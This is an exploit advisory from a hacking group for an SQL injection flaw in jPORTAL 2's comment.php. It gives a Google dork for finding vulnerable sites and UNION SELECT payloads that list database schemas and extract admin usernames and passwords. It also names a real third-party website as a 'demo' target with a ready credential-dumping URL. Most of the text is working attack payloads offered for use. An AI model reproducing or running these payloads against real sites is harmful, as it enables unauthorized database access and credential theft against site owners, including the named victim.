############################################################################ # Exploit Title: jPORTAL 2 SQL Injection Vulnerabilitiy # Google Dork: "powered by jPORTAL 2" # Date: 8/12/2011 # Author: H4ckCity Security Team # Discovered By: farbodmahini # Home: WwW.H4ckCity.Org # Software Link: http://jportal2.com/ # Version: All Version # Security Risk::High # Tested on: GNU/Linux Ubuntu - Windows Server ############################################################################ # Exploit: # # http://target.com/comment.php?what=news&id=[sqli] # # For get The DB: # # http://target.com/comment.phpwhat=news&id=999 union all select null,null,(select distinct # concat(unhex(Hex(cast(schema_name as char)))) from `information_schema`.schemata limit # 1,1),null,null,null,null,null,null-- # # For get The Username & Password : # # http://target.com/comment.phpwhat=news&id=999 union all select null,null,(select concat # (unhex(Hex(cast(admins.nick as char))),0x3a,unhex(Hex(cast(admins.pass as char)))) from # `target_database`.admins Order by nick limit 0,1) ,null,null,null,null,null,null-- # # Demo: # # http://www.lotnisko.szprotawa.org.pl/comment.php?what=news&id=3 union all # select null,null,(select concat(unhex(Hex(cast(admins.nick as char))),0x3a,unhex(Hex(cast # (admins.pass as char)))) from `tmnet_lotnisko`.admins Order by nick limit 0,1) # ,null,null,null,null,null,null-- # ############################################################################ # Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R- # nitrojen90-hellboy-K0242-kingcope-Mr.M4st3r , ... ############################################################################ GreetZ : All H4ckCity Member ############################################################################